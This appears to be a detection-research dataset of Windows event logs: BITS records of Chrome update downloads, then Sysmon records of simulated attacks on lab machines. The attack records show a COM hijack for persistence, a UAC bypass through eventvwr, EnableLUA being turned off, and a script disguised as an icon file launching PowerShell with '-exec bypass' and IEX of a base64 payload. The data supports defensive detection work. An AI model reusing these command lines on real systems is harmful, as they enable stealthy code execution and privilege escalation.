30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - EventID: 59 - EventRecordID: 8530 - Execution_attributes: - ProcessID: 7344 - ThreadID: 3400 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-05T10:55:56.114648Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: DE4AC99A-C567-4CAA-9703-3FFEE775C75D - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1708800 - bytesTransferred: 1708800 - bytesTransferredFromPeer: 0 - fileLength: 1708800 
- fileTime: "2020-11-02T06:40:20Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - url: "http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 30A3A3D8-9715-42EE-A715-CBA39B04E3A4 - EventID: 60 - EventRecordID: 8531 - Execution_attributes: - ProcessID: 7344 - ThreadID: 9012 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-05T10:56:12.615763Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 - bytesTotal: 2603264 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 2603264 - fileTime: "2020-11-08T13:58:52Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe" - peer: "" - transferId: 7E43CA01-DD5D-4814-8A56-15F509508F44 - url: "http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: 
- ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 - EventID: 59 - EventRecordID: 8833 - Execution_attributes: - ProcessID: 4908 - ThreadID: 4660 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-12T10:56:13.148615Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: FF56F08A-3D87-4A27-9E54-1444A29F0449 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 2603264 - bytesTransferred: 2603264 - bytesTransferredFromPeer: 0 - fileLength: 2603264 - fileTime: "2020-11-08T13:58:52Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 7E43CA01-DD5D-4814-8A56-15F509508F44 - url: "http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 7E43CA01-DD5D-4814-8A56-15F509508F44 - EventID: 60 - EventRecordID: 8834 - Execution_attributes: - ProcessID: 4908 - ThreadID: 5396 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-12T10:57:10.415576Z" - Version: 1 -Event_attributes: - xmlns: 
"http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F - bytesTotal: 22209280 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 22209280 - fileTime: "2020-11-17T11:37:37Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe" - peer: "" - transferId: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - url: "http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - EventID: 59 - EventRecordID: 8971 - Execution_attributes: - ProcessID: 8076 - ThreadID: 368 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-18T21:49:57.232015Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 6BFD2AD8-963A-4E3D-A596-DDB00305910F - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 22209280 - bytesTransferred: 22209280 - bytesTransferredFromPeer: 0 - fileLength: 22209280 - fileTime: "2020-11-17T11:37:37Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - url: 
"http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 3FBCCCA9-5F54-4F3C-A2DE-A805CAC185BD - EventID: 60 - EventRecordID: 8972 - Execution_attributes: - ProcessID: 8076 - ThreadID: 8756 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2020-11-18T21:53:25.998024Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 - bytesTotal: 1304160 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 1304160 - fileTime: "2021-01-22T06:31:14Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe" - peer: "" - transferId: 6125DC77-C387-4662-BB2F-F3816D1B4629 - url: "http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 - EventID: 59 - EventRecordID: 9404 - Execution_attributes: - ProcessID: 8100 - ThreadID: 4424 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - 
TimeCreated_attributes: - SystemTime: "2021-03-15T18:55:38.049422Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 3774C88F-94AD-4FC0-A559-EA76B5D829D6 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 1304160 - bytesTransferred: 1304160 - bytesTransferredFromPeer: 0 - fileLength: 1304160 - fileTime: "2021-01-22T06:31:14Z" - hr: 0 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 6125DC77-C387-4662-BB2F-F3816D1B4629 - url: "http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 6125DC77-C387-4662-BB2F-F3816D1B4629 - EventID: 60 - EventRecordID: 9405 - Execution_attributes: - ProcessID: 8100 - ThreadID: 5972 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T18:55:51.603329Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 - bytesTotal: 44403064 - bytesTransferred: 0 - bytesTransferredFromPeer: 0 - fileLength: 44403064 - fileTime: "2021-03-05T05:05:54Z" - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe" - peer: "" - transferId: 606AA2F9-84AC-48B8-B85C-1712683C075C - url: 
"http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C - EventID: 59 - EventRecordID: 9408 - Execution_attributes: - ProcessID: 8100 - ThreadID: 4396 - Keywords: "0x4000000000000000" - Level: 4 - Opcode: 1 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T19:01:32.985061Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - AdditionalInfoHr: 0 - Id: 78E48D71-6706-4BEF-BE13-DD6596AECB77 - PeerContextInfo: 0 - bandwidthLimit: 18446744073709551615 - bytesTotal: 44403064 - bytesTransferred: 19602924 - bytesTransferredFromPeer: 0 - fileLength: 44403064 - fileTime: "2021-03-05T05:05:54Z" - hr: 2147954430 - ignoreBandwidthLimitsOnLan: false - name: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe" - peer: "" - peerProtocolFlags: 0 - proxy: "" - transferId: 606AA2F9-84AC-48B8-B85C-1712683C075C - url: "http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes" - System: - Channel: Microsoft-Windows-Bits-Client/Operational - Computer: MSEDGEWIN10 - Correlation_attributes: - ActivityID: 606AA2F9-84AC-48B8-B85C-1712683C075C - EventID: 61 - EventRecordID: 9409 - Execution_attributes: - ProcessID: 8100 - ThreadID: 3656 - 
Keywords: "0x4000000000000000" - Level: 3 - Opcode: 2 - Provider_attributes: - Guid: EF1CC15B-46C1-414E-BB95-E76B077BD51E - Name: Microsoft-Windows-Bits-Client - Security_attributes: - UserID: S-1-5-18 - Task: 0 - TimeCreated_attributes: - SystemTime: "2021-03-15T19:29:05.990760Z" - Version: 1 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: regsvcser.Bypass - EventType: SetValue - Image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe" - ProcessGuid: 747F3D96-D7BB-5D31-0000-0010D5092A00 - ProcessId: 1060 - RuleName: Persistence - COM Hijack - TargetObject: "HKCR\\WOW6432Node\\CLSID\\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\\InprocServer32\\Class" - UtcTime: "2019-07-19 14:46:20.729" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 3622 - Execution_attributes: - ProcessID: 2796 - ThreadID: 3592 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-07-19T14:46:20.787648Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: regsvcser.Bypass - EventType: SetValue - Image: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe" - ProcessGuid: 747F3D96-D7BB-5D31-0000-0010D5092A00 - ProcessId: 1060 - RuleName: Persistence - COM Hijack - TargetObject: "HKCR\\WOW6432Node\\CLSID\\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\\InprocServer32\\0.0.0.0\\Class" - UtcTime: "2019-07-19 14:46:20.729" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 3626 - Execution_attributes: - ProcessID: 2796 - ThreadID: 3592 - Keywords: "0x8000000000000000" - Level: 
4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-07-19T14:46:20.830945Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51D0-5F93-0000-001036A15B00 - ProcessId: 3396 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:57:36.375" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424060 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:57:36.375368Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51D0-5F93-0000-001036A15B00 - ProcessId: 3396 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:57:36.375" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424064 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - 
Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:57:36.376024Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51FD-5F93-0000-00103B425E00 - ProcessId: 7504 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:58:21.922" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424244 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:58:21.930237Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000001) - EventType: SetValue - Image: "C:\\Windows\\SysWOW64\\rundll32.exe" - ProcessGuid: 747F3D96-51FD-5F93-0000-00103B425E00 - ProcessId: 7504 - RuleName: "" - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" - UtcTime: "2020-10-23 21:58:21.922" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 424248 - Execution_attributes: - ProcessID: 3208 - ThreadID: 4804 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 
5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-10-23T21:58:21.931190Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" " - Company: Microsoft Corporation - CurrentDirectory: "C:\\Users\\IEUser\\" - Description: Microsoft Management Console - FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) - Hashes: "SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1" - Image: "C:\\Windows\\System32\\mmc.exe" - IntegrityLevel: High - LogonGuid: 365ABB72-AB27-5CB8-0000-002021CA0000 - LogonId: "0xca21" - ParentCommandLine: "\"C:\\Windows\\system32\\eventvwr.exe\" " - ParentImage: "C:\\Windows\\System32\\eventvwr.exe" - ParentProcessGuid: 365ABB72-AC60-5CB8-0000-001002B30800 - ParentProcessId: 3904 - ProcessGuid: 365ABB72-AC60-5CB8-0000-001037BA0800 - ProcessId: 3900 - Product: Microsoft® Windows® Operating System - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TerminalSessionId: 1 - User: "IEWIN7\\IEUser" - UtcTime: "2019-04-18 16:57:04.500" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 1 - EventRecordID: 15 - Execution_attributes: - ProcessID: 3192 - ThreadID: 3288 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-04-18T16:57:04.681038Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - 
EventType: CreateKey - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: DFAE8213-70EB-5CDD-0000-0010F66D0A00 - ProcessId: 3788 - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TargetObject: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system" - UtcTime: "2019-05-16 14:17:15.758" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: DC1.insecurebank.local - Correlation: ~ - EventID: 12 - EventRecordID: 18618 - Execution_attributes: - ProcessID: 1780 - ThreadID: 2204 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-05-16T14:17:15.763712Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: DWORD (0x00000000) - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: DFAE8213-70EB-5CDD-0000-0010F66D0A00 - ProcessId: 3788 - RuleName: "technique_id=T1088,technique_name=Bypass User Account Control" - TargetObject: "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA" - UtcTime: "2019-05-16 14:17:15.758" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: DC1.insecurebank.local - Correlation: ~ - EventID: 13 - EventRecordID: 18619 - Execution_attributes: - ProcessID: 1780 - ThreadID: 2204 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-05-16T14:17:15.763712Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs 
c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Microsoft ® Windows Based Script Host - FileVersion: 5.812.10240.16384 - Hashes: "SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C" - Image: "C:\\Windows\\System32\\wscript.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-F419-5D53-0000-002026910200 - LogonId: "0x29126" - ParentCommandLine: "\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}" - ParentImage: "C:\\Windows\\System32\\rundll32.exe" - ParentProcessGuid: 747F3D96-FBCA-5D53-0000-0010B8664100 - ParentProcessId: 2476 - ProcessGuid: 747F3D96-FBCA-5D53-0000-001036784100 - ProcessId: 2876 - Product: Microsoft ® Windows Script Host - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-08-14 12:17:14.661" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 10675 - Execution_attributes: - ProcessID: 2004 - ThreadID: 4480 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-08-14T12:17:14.893930Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX 
([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Microsoft ® Windows Based Script Host - FileVersion: 5.812.10240.16384 - Hashes: "SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C" - Image: "C:\\Windows\\System32\\wscript.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-F419-5D53-0000-002026910200 - LogonId: "0x29126" - ParentCommandLine: "C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding" - ParentImage: "C:\\Windows\\explorer.exe" - ParentProcessGuid: 747F3D96-F639-5D53-0000-001092EE2600 - ParentProcessId: 6000 - ProcessGuid: 747F3D96-F639-5D53-0000-0010B0FC2600 - ProcessId: 8180 - Product: Microsoft ® Windows Script Host - RuleName: "" - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-08-14 11:53:29.768" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 10662 - Execution_attributes: - ProcessID: 2004 - ThreadID: 4480 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: 